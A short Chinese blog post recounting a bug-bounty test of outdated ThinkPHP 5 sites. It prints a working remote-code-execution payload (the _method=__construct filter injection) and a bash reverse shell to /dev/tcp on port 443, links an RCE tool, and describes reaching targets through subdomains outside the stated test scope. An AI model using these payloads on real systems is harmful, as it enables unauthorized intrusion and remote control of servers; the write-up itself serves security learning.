网站菜单

Thinkphp5挖洞记录

闲来无事,盒子上申请了下项目,发现二个thinkPHP的站,版本还都挺老,记录一下反弹shell的过程

盒子项目申请一过,准时准点往前冲,发现测试范围只有一个子域名,稍微过了一下,前排明显的漏洞应该大佬们都提完了,就想着大佬们往前冲,我就另辟蹊径看看能不能通过其他子域进到测试范围。

惯例先干子域名,用oneforall跑了下子域名,大概几十个,然后用goby过了一下子域的资产,发现有二个站用的是老版本的thinkPHP

Thinkphp5挖洞记录的照片 - 1

心里的想法就开始躁动不安了,那可得好好干一下,tp5的洞第一次挖,也顺带记录学习一下,往后备用。

中间参考的文章:https://www.freebuf.com/column/230787.html

中间xray给出的exp:

_method=__construct&filter[]=system&get[]=whoami&method=get
Thinkphp5挖洞记录的照片 - 2

反弹shell这里有个不大不小的坑,可能就是我太菜了,没有想到是需要url编码,所以没反弹成功

Poc:bash -i >& /dev/tcp/10.10.10.11/443 0>&1(反弹需要url编码)

反弹成功截图

Thinkphp5挖洞记录的照片 - 3
Thinkphp5挖洞记录的照片 - 4

千里之行,始于足下,点滴积累,终将汇聚成河流,纯属小白记录一下挖洞的踩坑过程。

使用到tp5检测工具:https://github.com/sukabuliet/ThinkphpRCE

显示评论 (0)

文章评论

相关推荐

记一次某SRC的漏洞挖掘

起因: 最近闲来无事,无意中发现某src搞活动双倍奖励,一下激起了我的动力,双倍奖励啊,又到了低危小王子浑水摸鱼的时候了。 过程: 话不多说,直接开干,子域名走一波。发现某域名命名很奇怪,然后titl…

PTES-渗透测试执行标准(重译版)

PTES-渗透测试执行标准(重译版)